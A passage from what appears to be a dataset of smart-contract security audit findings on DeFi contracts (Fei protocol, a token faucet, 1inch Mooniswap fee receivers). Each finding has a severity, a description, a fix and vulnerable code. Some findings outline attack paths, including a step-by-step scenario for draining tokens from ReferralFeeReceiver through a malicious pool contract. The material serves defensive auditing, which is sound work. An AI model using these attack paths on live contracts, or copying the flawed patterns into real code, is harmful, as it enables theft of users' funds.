tokenInfo.getLastBorrowBlock()) == 0) {\\n accruedRate = INT\\_UNIT;\\n } else {\\n accruedRate = globalConfig.bank().borrowRateIndexNow(\\_token)\\n .mul(INT\\_UNIT)\\n .div(globalConfig.bank().borrowRateIndex(\\_token, tokenInfo.getLastBorrowBlock()));\\n }\\n return tokenInfo.getBorrowBalance(accruedRate);\\n }\\n}\\n```\\n\\nIn a worst case scenario, each iteration may perform a maximum of 25+ calls/delegatecalls. 
Assuming a maximum `tokenNum` of 128 (TokenRegistry.MAX_TOKENS), the gas cost for this method may reach upwards of 2 million for external calls alone.\\nGiven that this figure would only be a portion of the total transaction gas cost, `getBorrowETH` may represent a DoS risk within the `Accounts` contract.чAvoid for loops unless absolutely necessary\\nWhere possible, consolidate multiple subsequent calls to the same contract to a single call, and store the results of calls in local variables for re-use. For example,\\nInstead of this:\\n```\\nuint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\nfor(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n}\\n```\\n\\nModify `TokenRegistry` to support a single call, and cache intermediate results like this:\\n```\\nTokenRegistry registry = globalConfig.tokenInfoRegistry();\\nuint tokenNum = registry.getCoinLength();\\nfor(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n // here, getPriceFromIndex(i) performs all of the steps as the code above, but with only 1 ext call\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(registry.getPriceFromIndex(i)).div(divisor));\\n }\\n}\\n```\\nчч```\\nfunction getBorrowETH(\\n address \\_accountAddr\\n) public view returns (uint256 borrowETH) {\\n uint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\n //console.log(\"tokenNum\", tokenNum);\\n for(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address 
tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n }\\n return borrowETH;\\n}\\n```\\n -Naming inconsistencyчlowчThere are some inconsistencies in the naming of some functions with what they do.\\n```\\n function getCoinLength() public view returns (uint256 length) { //@audit-info coin vs token\\n return tokens.length;\\n }\\n```\\nчReview the code for the naming inconsistencies.чч```\\n function getCoinLength() public view returns (uint256 length) { //@audit-info coin vs token\\n return tokens.length;\\n }\\n```\\n -TokenFaucet refill can have an unexpected outcomeчmediumчThe `TokenFaucet` contract can only disburse tokens to the users if it has enough balance. When the contract is running out of tokens, it stops dripping.\\n```\\nuint256 assetTotalSupply = asset.balanceOf(address(this));\\nuint256 availableTotalSupply = assetTotalSupply.sub(totalUnclaimed);\\nuint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\nuint256 nextExchangeRateMantissa = exchangeRateMantissa;\\nuint256 newTokens;\\nuint256 measureTotalSupply = measure.totalSupply();\\n\\nif (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n newTokens = newSeconds.mul(dripRatePerSecond);\\n if (newTokens > availableTotalSupply) {\\n newTokens = availableTotalSupply;\\n }\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0;\\n nextExchangeRateMantissa = nextExchangeRateMantissa.add(indexDeltaMantissa);\\n\\n emit Dripped(\\n newTokens\\n );\\n}\\n```\\n\\nThe owners of the faucet can decide to refill the contract so it can disburse tokens again. 
If there's been a lot of time since the faucet was drained, the `lastDripTimestamp` value can be far behind the `currentTimestamp`. In that case, the users can instantly withdraw some amount (up to all the balance) right after the refill.чTo avoid uncertainty, it's essential to call the `drip` function before the refill. If this call is made in a separate transaction, the owner should make sure that this transaction was successfully mined before sending tokens for the refill.чч```\\nuint256 assetTotalSupply = asset.balanceOf(address(this));\\nuint256 availableTotalSupply = assetTotalSupply.sub(totalUnclaimed);\\nuint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\nuint256 nextExchangeRateMantissa = exchangeRateMantissa;\\nuint256 newTokens;\\nuint256 measureTotalSupply = measure.totalSupply();\\n\\nif (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n newTokens = newSeconds.mul(dripRatePerSecond);\\n if (newTokens > availableTotalSupply) {\\n newTokens = availableTotalSupply;\\n }\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0;\\n nextExchangeRateMantissa = nextExchangeRateMantissa.add(indexDeltaMantissa);\\n\\n emit Dripped(\\n newTokens\\n );\\n}\\n```\\n -Gas Optimization on transfersчlowчIn TokenFaucet, on every transfer `_captureNewTokensForUser` is called twice. This function does a few calculations and writes the latest UserState to the storage. 
However, if `lastExchangeRateMantissa == exchangeRateMantissa`, or in other words, if two transfers happen in the same block, there are no changes in the newToken amounts, so there is an extra storage store with the same values.\\n`deltaExchangeRateMantissa` will be 0 in case two transfers (no matter from or to) are in the same block for a user.\\n```\\n uint256 deltaExchangeRateMantissa = uint256(exchangeRateMantissa).sub(userState.lastExchangeRateMantissa);\\n uint128 newTokens = FixedPoint.multiplyUintByMantissa(userMeasureBalance, deltaExchangeRateMantissa).toUint128();\\n userStates[user] = UserState({\\n lastExchangeRateMantissa: exchangeRateMantissa,\\n balance: uint256(userState.balance).add(newTokens).toUint128()\\n });\\n```\\nчReturn without storage update if `lastExchangeRateMantissa == exchangeRateMantissa`, or by another method if `deltaExchangeRateMantissa == 0`. This reduces the gas cost for active users (high number of transfers that might be in the same block).чч```\\n uint256 deltaExchangeRateMantissa = uint256(exchangeRateMantissa).sub(userState.lastExchangeRateMantissa);\\n uint128 newTokens = FixedPoint.multiplyUintByMantissa(userMeasureBalance, deltaExchangeRateMantissa).toUint128();\\n userStates[user] = UserState({\\n lastExchangeRateMantissa: exchangeRateMantissa,\\n balance: uint256(userState.balance).add(newTokens).toUint128()\\n });\\n```\\n -Handle transfer tokens where from == toчlowчIn TokenFaucet, when calling `beforeTokenTransfer` it should also be optimized when `to == from`.
This is to prevent any possible issues with internal accounting and token drip calculations.\\n```\\n// rest of code\\n if (token == address(measure) && from != address(0)) { //add && from != to\\n drip();\\n// rest of code\\n```\\nчAs per the ERC20 standard, `from == to` can be allowed, but check in `beforeTokenTransfer` that if `to == from`, `_captureNewTokensForUser(from);` is not called again.чч```\\n// rest of code\\n if (token == address(measure) && from != address(0)) { //add && from != to\\n drip();\\n// rest of code\\n```\\n -GenesisGroup.commit overwrites previously-committed valuesчhighч`commit` allows anyone to `commit` purchased FGEN to a swap that will occur once the genesis group is launched.
This commitment may be performed on behalf of other users, as long as the calling account has sufficient allowance:\\n```\\nfunction commit(address from, address to, uint amount) external override onlyGenesisPeriod {\\n burnFrom(from, amount);\\n\\n committedFGEN[to] = amount;\\n totalCommittedFGEN += amount;\\n\\n emit Commit(from, to, amount);\\n}\\n```\\n\\nThe `amount` stored in the recipient's `committedFGEN` balance overwrites any previously-committed value. Additionally, this also allows anyone to commit an `amount` of “0” to any account, deleting their commitment entirely.чEnsure the committed amount is added to the existing commitment.чч```\\nfunction commit(address from, address to, uint amount) external override onlyGenesisPeriod {\\n burnFrom(from, amount);\\n\\n committedFGEN[to] = amount;\\n totalCommittedFGEN += amount;\\n\\n emit Commit(from, to, amount);\\n}\\n```\\n -UniswapIncentive overflow on pre-transfer hooksчhighчBefore a token transfer is performed, `Fei` performs some combination of mint/burn operations via UniswapIncentive.incentivize:\\n```\\nfunction incentivize(\\n address sender,\\n address receiver, \\n address operator,\\n uint amountIn\\n) external override onlyFei {\\n updateOracle();\\n\\n if (isPair(sender)) {\\n incentivizeBuy(receiver, amountIn);\\n }\\n\\n if (isPair(receiver)) {\\n require(isSellAllowlisted(sender) || isSellAllowlisted(operator), \"UniswapIncentive: Blocked Fei sender or operator\");\\n incentivizeSell(sender, amountIn);\\n }\\n}\\n```\\n\\nBoth `incentivizeBuy` and `incentivizeSell` calculate buy/sell incentives using overflow-prone math, then mint / burn from the target according to the results. 
This may have unintended consequences, like allowing a caller to mint tokens before transferring them, or burn tokens from their recipient.\\n`incentivizeBuy` calls `getBuyIncentive` to calculate the final minted value:\\n```\\nfunction incentivizeBuy(address target, uint amountIn) internal ifMinterSelf {\\n if (isExemptAddress(target)) {\\n return;\\n }\\n\\n (uint incentive, uint32 weight,\\n Decimal.D256 memory initialDeviation,\\n Decimal.D256 memory finalDeviation) = getBuyIncentive(amountIn);\\n\\n updateTimeWeight(initialDeviation, finalDeviation, weight);\\n if (incentive != 0) {\\n fei().mint(target, incentive); \\n }\\n}\\n```\\n\\n`getBuyIncentive` calculates price deviations after casting `amount` to an `int256`, which may overflow:\\n```\\nfunction getBuyIncentive(uint amount) public view override returns(\\n uint incentive,\\n uint32 weight,\\n Decimal.D256 memory initialDeviation,\\n Decimal.D256 memory finalDeviation\\n) {\\n (initialDeviation, finalDeviation) = getPriceDeviations(-1 \\* int256(amount));\\n```\\nчResolution\\nThis was addressed in fei-protocol/fei-protocol-core#15.\\nEnsure casts in `getBuyIncentive` and `getSellPenalty` do not overflow.чч```\\nfunction incentivize(\\n address sender,\\n address receiver, \\n address operator,\\n uint amountIn\\n) external override onlyFei {\\n updateOracle();\\n\\n if (isPair(sender)) {\\n incentivizeBuy(receiver, amountIn);\\n }\\n\\n if (isPair(receiver)) {\\n require(isSellAllowlisted(sender) || isSellAllowlisted(operator), \"UniswapIncentive: Blocked Fei sender or operator\");\\n incentivizeSell(sender, amountIn);\\n }\\n}\\n```\\n -BondingCurve allows users to acquire FEI before launchчmediumч`BondingCurve.allocate` allocates the protocol's held PCV, then calls `_incentivize`, which rewards the caller with FEI if a certain amount of time has passed:\\n```\\n/// @notice if window has passed, reward caller and reset window\\nfunction \\_incentivize() internal virtual {\\n if (isTimeEnded()) {\\n 
\\_initTimed(); // reset window\\n fei().mint(msg.sender, incentiveAmount);\\n }\\n}\\n```\\n\\n`allocate` can be called before genesis launch, as long as the contract holds some nonzero PCV. By force-sending the contract 1 wei, anyone can bypass the majority of checks and actions in `allocate`, and mint themselves FEI each time the timer expires.чPrevent `allocate` from being called before genesis launch.чч```\\n/// @notice if window has passed, reward caller and reset window\\nfunction \\_incentivize() internal virtual {\\n if (isTimeEnded()) {\\n \\_initTimed(); // reset window\\n fei().mint(msg.sender, incentiveAmount);\\n }\\n}\\n```\\n -Overflow/underflow protectionчmediumчHaving overflow/underflow vulnerabilities is very common for smart contracts. It is usually mitigated by using `SafeMath` or using solidity version ^0.8 (after solidity 0.8 arithmetical operations already have default overflow/underflow protection).\\nIn this code, many arithmetical operations are used without the ‘safe' version. The reasoning behind it is that all the values are derived from the actual ETH values, so they can't overflow.\\nOn the other hand, some operations can't be checked for overflow/underflow without going much deeper into the codebase that is out of scope:\\n```\\nuint totalGenesisTribe = tribeBalance() - totalCommittedTribe;\\n```\\nчResolution\\nThis was partially addressed in fei-protocol/fei-protocol-core#17 by using `SafeMath` for the specific example given in the description.\\nIn our opinion, it is still safer to have these operations in a safe mode. 
So we recommend using `SafeMath` or solidity version ^0.8 compiler.чч```\\nuint totalGenesisTribe = tribeBalance() - totalCommittedTribe;\\n```\\n -Unchecked return value for IWETH.transfer callчmediumчIn `EthUniswapPCVController`, there is a call to `IWETH.transfer` that does not check the return value:\\n```\\nweth.transfer(address(pair), amount);\\n```\\n\\nIt is usually good to add a require-statement that checks the return value or to use something like safeTransfer; unless one is sure the given token reverts in case of a failure.чConsider adding a require-statement or using `safeTransfer`.чч```\\nweth.transfer(address(pair), amount);\\n```\\n -GenesisGroup.emergencyExit remains functional after launchчmediumч`emergencyExit` is intended as an escape mechanism for users in the event the genesis `launch` method fails or is frozen. `emergencyExit` becomes callable 3 days after `launch` is callable. These two methods are intended to be mutually-exclusive, but are not: either method remains callable after a successful call to the other.\\nThis may result in accounting edge cases. 
In particular, `emergencyExit` fails to decrease `totalCommittedFGEN` by the exiting user's commitment:\\n```\\nburnFrom(from, amountFGEN);\\ncommittedFGEN[from] = 0;\\n\\npayable(to).transfer(total);\\n```\\n\\nAs a result, calling launch after a user performs an exit will incorrectly calculate the amount of FEI to swap:\\n```\\nuint amountFei = feiBalance() \\* totalCommittedFGEN / (totalSupply() + totalCommittedFGEN);\\nif (amountFei != 0) {\\n totalCommittedTribe = ido.swapFei(amountFei);\\n}\\n```\\nчEnsure `launch` cannot be called if `emergencyExit` has been called\\nEnsure `emergencyExit` cannot be called if `launch` has been called\\nIn `emergencyExit`, reduce `totalCommittedFGEN` by the exiting user's committed amountчч```\\nburnFrom(from, amountFGEN);\\ncommittedFGEN[from] = 0;\\n\\npayable(to).transfer(total);\\n```\\n -Unchecked return value for transferFrom callsчmediumчThere are two `transferFrom` calls that do not check the return value (some tokens signal failure by returning false):\\n```\\nstakedToken.transferFrom(from, address(this), amount);\\n```\\n\\n```\\nfei().transferFrom(msg.sender, address(pair), amountFei);\\n```\\n\\nIt is usually good to add a require-statement that checks the return value or to use something like safeTransferFrom; unless one is sure the given token reverts in case of a failure.чConsider adding a require-statement or using `safeTransferFrom`.чч```\\nstakedToken.transferFrom(from, address(this), amount);\\n```\\n -Pool: claiming to the pool itself causes accounting issuesчlowч```\\nfunction \\_claim(address from, address to) internal returns (uint256) {\\n (uint256 amountReward, uint256 amountPool) = redeemableReward(from);\\n require(amountPool != 0, \"Pool: User has no redeemable pool tokens\");\\n\\n \\_burnFrom(from, amountPool);\\n \\_incrementClaimed(amountReward);\\n\\n rewardToken.transfer(to, amountReward);\\n return amountReward;\\n}\\n```\\n\\nIf the destination address `to` is the pool itself, the pool will 
burn tokens and increment the amount of tokens claimed, then transfer the reward tokens `to` itself.чResolution\\nThis was addressed in fei-protocol/fei-protocol-core#57\\nPrevent claims from specifying the pool as a destination.чч```\\nfunction \\_claim(address from, address to) internal returns (uint256) {\\n (uint256 amountReward, uint256 amountPool) = redeemableReward(from);\\n require(amountPool != 0, \"Pool: User has no redeemable pool tokens\");\\n\\n \\_burnFrom(from, amountPool);\\n \\_incrementClaimed(amountReward);\\n\\n rewardToken.transfer(to, amountReward);\\n return amountReward;\\n}\\n```\\n -Assertions that can failчlowчIn `UniswapSingleEthRouter` there are two assert-statements that may fail:\\n```\\nassert(msg.sender == address(WETH)); // only accept ETH via fallback from the WETH contract\\n```\\n\\n```\\nassert(IWETH(WETH).transfer(address(PAIR), amountIn));\\n```\\n\\nSince they do some sort of input validation it might be good to replace them with require-statements. I would only use asserts for checks that should never fail and failure would constitute a bug in the code.чConsider replacing the assert-statements with require-statements. An additional benefit is that this will not result in consuming all the gas in case of a violation.чч```\\nassert(msg.sender == address(WETH)); // only accept ETH via fallback from the WETH contract\\n```\\n -Simplify API of GenesisGroup.purchaseчlowчThe API of `GenesisGroup.purchase` could be simplified by not including the `value` parameter that is required to be equivalent to msg.value:\\n```\\nrequire(msg.value == value, \"GenesisGroup: value mismatch\");\\n```\\n\\nUsing `msg.value` might make the API more explicit and avoid requiring `msg.value == value`. 
It can also save some gas due to fewer inputs and fewer checks.чConsider dropping the `value` parameter and changing the code to use `msg.value` instead.чч```\\nrequire(msg.value == value, \"GenesisGroup: value mismatch\");\\n```\\n -[Out of Scope] ReferralFeeReceiver - anyone can steal all the funds that belong to ReferralFeeReceiver UnverifiedчhighчNote: This issue was raised in components that were being affected by the scope reduction as outlined in the section “Scope” and are, therefore, only shallowly validated. Nevertheless, we find it important to communicate such potential findings and ask the client to further investigate.\\nThe `ReferralFeeReceiver` receives pool shares when users `swap()` tokens in the pool. A `ReferralFeeReceiver` may be used with multiple pools and, therefore, be a lucrative target as it is holding pool shares.\\nAny token or `ETH` that belongs to the `ReferralFeeReceiver` is at risk and can be drained by any user by providing a custom `mooniswap` pool contract that references existing token holdings.\\nIt should be noted that none of the functions in `ReferralFeeReceiver` verify that the user-provided `mooniswap` pool address was actually deployed by the linked `MooniswapFactory`. The factory provides certain security guarantees about `mooniswap` pool contracts (e.g. valid `mooniswap` contract, token deduplication, tokenA!=tokenB, enforced token sorting, …), however, since the `ReferralFeeReceiver` does not verify the user-provided `mooniswap` address they are left unchecked.\\nAdditional Notes\\n`freezeEpoch` - (callable by anyone) performs a `pool.withdraw()` with the `minAmounts` check being disabled. This may allow someone to call this function at a time where the contract actually gets a bad deal.\\n`trade` - (callable by anyone) can intentionally be used to perform bad trades (front-runnable)\\n`trade` - (callable by anyone) appears to implement inconsistent behavior when sending out `availableBalance`. 
`ETH` is sent to `tx.origin` (the caller) while tokens are sent to the user-provided `mooniswap` address.\\n```\\nif (path[0].isETH()) {\\n tx.origin.transfer(availableBalance); // solhint-disable-line avoid-tx-origin\\n} else {\\n path[0].safeTransfer(address(mooniswap), availableBalance);\\n}\\n```\\n\\nmultiple methods - since `mooniswap` is a user-provided address there are a lot of opportunities to reenter the contract. Consider adding reentrancy guards as another security layer (e.g. `claimCurrentEpoch` and others).\\nmultiple methods - do not validate the amount of tokens that are returned, causing an evm assertion due to out of bounds index access.\\n```\\nIERC20[] memory tokens = mooniswap.getTokens();\\nuint256 token0Balance = tokens[0].uniBalanceOf(address(this));\\nuint256 token1Balance = tokens[1].uniBalanceOf(address(this));\\n```\\n\\nin `GovernanceFeeReceiver` anyone can intentionally force unwrapping of pool tokens or perform swaps in the worst time possible. e.g. The checks for `withdraw(..., minAmounts)` is disabled.\\n```\\nfunction unwrapLPTokens(Mooniswap mooniswap) external validSpread(mooniswap) {\\n mooniswap.withdraw(mooniswap.balanceOf(address(this)), new uint256[](0));\\n}\\n\\nfunction swap(IERC20[] memory path) external validPath(path) {\\n (uint256 amount,) = \\_maxAmountForSwap(path, path[0].uniBalanceOf(address(this)));\\n uint256 result = \\_swap(path, amount, payable(address(rewards)));\\n rewards.notifyRewardAmount(result);\\n}\\n```\\n\\nA malicious user can drain all token by calling `claimFrozenEpoch` with a custom contract as `mooniswap` that returns a token address the `ReferralFeeReceiver` contracts holds token from in `IERC20[] memory tokens = mooniswap.getTokens();`. 
A subsequent call to `_transferTokenShare()` will then send out any amount of token requested by the attacker to the attacker-controlled address (msg.sender).\\nLet's assume the following scenario:\\n`ReferralFeeReceiver` holds `DAI` token and we want to steal them.\\nAn attacker may be able to drain the contract from `DAI` token via `claimFrozenToken` if\\nthey control the `mooniswap` address argument and provide a malicious contract\\n`user.share[mooniswap][firstUnprocessedEpoch] > 0` - this can be arbitrarily set in `updateReward`\\n`token.epochBalance[currentEpoch].token0Balance > 0` - this can be manipulated in `freezeEpoch` by providing a malicious `mooniswap` contract\\nthey own a worthless `ERC20` token e.g. named `ATTK`\\nThe following steps outline the attack:\\nThe attacker calls into `updateReward` to set `user.share[mooniswap][currentEpoch]` to a value that is greater than zero to make sure that `share` in `claimFrozenEpoch` takes the `_transferTokenShare` path.\\n```\\nfunction updateReward(address referral, uint256 amount) external override {\\n Mooniswap mooniswap = Mooniswap(msg.sender);\\n TokenInfo storage token = tokenInfo[mooniswap];\\n UserInfo storage user = userInfo[referral];\\n uint256 currentEpoch = token.currentEpoch;\\n\\n // Add new reward to current epoch\\n user.share[mooniswap][currentEpoch] = user.share[mooniswap][currentEpoch].add(amount);\\n token.epochBalance[currentEpoch].totalSupply = token.epochBalance[currentEpoch].totalSupply.add(amount);\\n\\n // Collect all processed epochs and advance user token epoch\\n \\_collectProcessedEpochs(user, token, mooniswap, currentEpoch);\\n}\\n```\\n\\nThe attacker then calls `freezeEpoch()` providing the malicious `mooniswap` contract address controlled by the attacker.\\nThe malicious contract returns token that is controlled by the attacker (e.g. 
ATTK) in a call to `mooniswap.getTokens();`\\nThe contract then stores the current balance of the attacker-controlled token in `token0Balance/token1Balance`. Note that the token being returned here by the malicious contract can be different from the one we're checking out in the last step (balance manipulation via `ATTK`, checkout of `DAI` in the last step).\\nThen the contract calls out to the malicious `mooniswap` contract. This gives the malicious contract an easy opportunity to send some attacker-controlled token (ATTK) to the `ReferralFeeReceiver` in order to freely manipulate the frozen tokenbalances (tokens[0].uniBalanceOf(address(this)).sub(token0Balance);).\\nNote that the used token addresses are never stored anywhere. The balances recorded here are for an attacker-controlled token (ATTK), not the actual one that we're about to steal (e.g. DAI)\\nThe token balances are now set-up for checkout in the last step (claimFrozenEpoch).\\n```\\nfunction freezeEpoch(Mooniswap mooniswap) external validSpread(mooniswap) {\\n TokenInfo storage token = tokenInfo[mooniswap];\\n uint256 currentEpoch = token.currentEpoch;\\n require(token.firstUnprocessedEpoch == currentEpoch, \"Previous epoch is not finalized\");\\n\\n IERC20[] memory tokens = mooniswap.getTokens();\\n uint256 token0Balance = tokens[0].uniBalanceOf(address(this));\\n uint256 token1Balance = tokens[1].uniBalanceOf(address(this));\\n mooniswap.withdraw(mooniswap.balanceOf(address(this)), new uint256[](0));\\n token.epochBalance[currentEpoch].token0Balance = tokens[0].uniBalanceOf(address(this)).sub(token0Balance);\\n token.epochBalance[currentEpoch].token1Balance = tokens[1].uniBalanceOf(address(this)).sub(token1Balance);\\n token.currentEpoch = currentEpoch.add(1);\\n}\\n```\\n\\nA call to `claimFrozenEpoch` checks-out the previously frozen token balance.\\nThe `claim > 0` requirement was fulfilled in step 1.\\nThe token balance was prepared for the attacker-controlled token (ATTK) in step 2, but we're 
now checking out `DAI`.\\nWhen the contract calls out to the attackers `mooniswap` contract the call to `IERC20[] memory tokens = mooniswap.getTokens();` returns the address of the token to be stolen (e.g. DAI) instead of the attacker-controlled token (ATTK) that was used to set-up the balance records.\\nSubsequently, the valuable target tokens (DAI) are sent out to the caller in `_transferTokenShare`.\\n```\\nif (share > 0) {\\n EpochBalance storage epochBalance = token.epochBalance[firstUnprocessedEpoch];\\n uint256 totalSupply = epochBalance.totalSupply;\\n user.share[mooniswap][firstUnprocessedEpoch] = 0;\\n epochBalance.totalSupply = totalSupply.sub(share);\\n\\n IERC20[] memory tokens = mooniswap.getTokens();\\n epochBalance.token0Balance = \\_transferTokenShare(tokens[0], epochBalance.token0Balance, share, totalSupply);\\n epochBalance.token1Balance = \\_transferTokenShare(tokens[1], epochBalance.token1Balance, share, totalSupply);\\n epochBalance.inchBalance = \\_transferTokenShare(inchToken, epochBalance.inchBalance, share, totalSupply);\\n```\\nчResolution\\nAccording to the client, this issue is addressed in 1inch-exchange/1inch-liquidity-protocol#2 and the reentrancy in `FeeReceiver` in 1inch-exchange/[email protected]e9c6a03\\n(This fix is as reported by the developer team, but has not been verified by Diligence).\\nEnforce that the user-provided `mooniswap` contract was actually deployed by the linked factory. Other contracts cannot be trusted. Consider implementing token sorting and de-duplication (tokenA!=tokenB) in the pool contract constructor as well. Consider employing a reentrancy guard to safeguard the contract from reentrancy attacks.\\nImprove testing. The methods mentioned here are not covered at all. 
Improve documentation and provide a specification that outlines how this contract is supposed to be used.\\nReview the “additional notes” provided with this issue.чч```\\nif (path[0].isETH()) {\\n tx.origin.transfer(availableBalance); // solhint-disable-line avoid-tx-origin\\n} else {\\n path[0].safeTransfer(address(mooniswap), availableBalance);\\n}\\n```\\n -GovernanceMothership - notifyFor allows to arbitrarily create new or override other users stake in governance modules UnverifiedчhighчThe `notify*` methods are called to update linked governance modules when an accounts stake changes in the Mothership. The linked modules then update their own balances of the user to accurately reflect the account's real stake in the Mothership.\\nBesides `notify` there's also a method named `notifyFor` which is publicly accessible. It is assumed that the method should be used similar to `notify` to force an update for another account's balance.\\nHowever, invoking the method forces an update in the linked modules for the provided address, but takes `balanceOf(msg.sender)` instead of `balanceOf(account)`. This allows malicious actors to:\\nArbitrarily change other accounts stake in linked governance modules (e.g. zeroing stake, increasing stake) based on the callers stake in the mothership\\nDuplicate stake out of thin air to arbitrary addresses (e.g. 
staking in mothership once and calling `notifyFor` many other account addresses)\\npublicly accessible method allows forcing stake updates for arbitrary users\\n```\\nfunction notifyFor(address account) external {\\n \\_notifyFor(account, balanceOf(msg.sender));\\n}\\n```\\n\\nthe method calls the linked governance modules\\n```\\nfunction \\_notifyFor(address account, uint256 balance) private {\\n uint256 modulesLength = \\_modules.length();\\n for (uint256 i = 0; i < modulesLength; ++i) {\\n IGovernanceModule(\\_modules.at(i)).notifyStakeChanged(account, balance);\\n }\\n}\\n```\\n\\nwhich will arbitrarily `mint` or `burn` stake in the `BalanceAccounting` of `Factory` or `Reward` (or other linked governance modules)\\n```\\nfunction notifyStakeChanged(address account, uint256 newBalance) external override onlyMothership {\\n \\_notifyStakeChanged(account, newBalance);\\n}\\n```\\n\\n```\\nfunction \\_notifyStakeChanged(address account, uint256 newBalance) internal override {\\n uint256 balance = balanceOf(account);\\n if (newBalance > balance) {\\n \\_mint(account, newBalance.sub(balance));\\n } else if (newBalance < balance) {\\n \\_burn(account, balance.sub(newBalance));\\n } else {\\n return;\\n }\\n uint256 newTotalSupply = totalSupply();\\n\\n \\_defaultFee.updateBalance(account, \\_defaultFee.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_FEE, \\_emitDefaultFeeVoteUpdate);\\n \\_defaultSlippageFee.updateBalance(account, \\_defaultSlippageFee.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_SLIPPAGE\\_FEE, \\_emitDefaultSlippageFeeVoteUpdate);\\n \\_defaultDecayPeriod.updateBalance(account, \\_defaultDecayPeriod.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_DECAY\\_PERIOD, \\_emitDefaultDecayPeriodVoteUpdate);\\n \\_referralShare.updateBalance(account, \\_referralShare.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_REFERRAL\\_SHARE, \\_emitReferralShareVoteUpdate);\\n 
\_governanceShare.updateBalance(account, \_governanceShare.votes[account], balance, newBalance, newTotalSupply, \_DEFAULT\_GOVERNANCE\_SHARE, \_emitGovernanceShareVoteUpdate);\n}\n```\n\n```\nfunction \_notifyStakeChanged(address account, uint256 newBalance) internal override updateReward(account) {\n uint256 balance = balanceOf(account);\n if (newBalance > balance) {\n \_mint(account, newBalance.sub(balance));\n } else if (newBalance < balance) {\n \_burn(account, balance.sub(newBalance));\n }\n}\n```\nчRemove `notifyFor` or change it to take the balance of the correct account `_notifyFor(account, balanceOf(account))`.\nIt is questionable whether the public `notify*()` family of methods is actually needed as stake should only change - and thus an update of linked modules should only be required - if an account calls `stake()` or `unstake()`. It should therefore be considered to remove `notify()`, `notifyFor` and `batchNotifyFor`.чч```\nfunction notifyFor(address account) external {\n \_notifyFor(account, balanceOf(msg.sender));\n}\n```\n -The uniTransferFrom function can potentially be used with invalid params UnverifiedчmediumчThe system is using the `UniERC20` contract to encapsulate transfers of both ERC-20 tokens and ETH. This contract has `uniTransferFrom` function that can be used for any ERC-20 or ETH:\n```\nfunction uniTransferFrom(IERC20 token, address payable from, address to, uint256 amount) internal {\n if (amount > 0) {\n if (isETH(token)) {\n require(msg.value >= amount, "UniERC20: not enough value");\n if (msg.value > amount) {\n // Return remainder if exist\n from.transfer(msg.value.sub(amount));\n }\n } else {\n token.safeTransferFrom(from, to, amount);\n }\n }\n}\n```\n\nIf the function is called for a normal ERC-20 token, everything works as expected. The tokens are transferred `from` the `from` address `to` the `to` address.
If the token is ETH - the transfer is expected `to` be `from` the `msg.sender` `to` `this` contract. Even if the `to` and `from` parameters are different.\\nThis issue's severity is not high because the function is always called with the proper parameters in the current codebase.чResolution\\nAccording to the client, this issue is addressed in 1inch-exchange/[email protected]d0ffb6f.\\n(This fix is as reported by the developer team, but has not been verified by Diligence).\\nMake sure that the `uniTransferFrom` function is always called with expected parameters.чч```\\nfunction uniTransferFrom(IERC20 token, address payable from, address to, uint256 amount) internal {\\n if (amount > 0) {\\n if (isETH(token)) {\\n require(msg.value >= amount, \"UniERC20: not enough value\");\\n if (msg.value > amount) {\\n // Return remainder if exist\\n from.transfer(msg.value.sub(amount));\\n }\\n } else {\\n token.safeTransferFrom(from, to, amount);\\n }\\n }\\n}\\n```\\n -MooniswapGovernance - votingpower is not accurately reflected when minting pool tokens UnverifiedчmediumчWhen a user provides liquidity to the pool, pool-tokens are minted. The minting event triggers the `_beforeTokenTransfer` callback in `MooniswapGovernance` which updates voting power reflecting the newly minted stake for the user.\\nThere seems to be a copy-paste error in the way `balanceTo` is determined that sets `balanceTo` to zero if new token were minted (from==address(0)). This means, that in a later call to `_updateOnTransfer` only the newly minted amount is considered when adjusting voting power.\\nIf tokens are newly minted `from==address(0)` and therefore `balanceTo -> 0`.\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? 
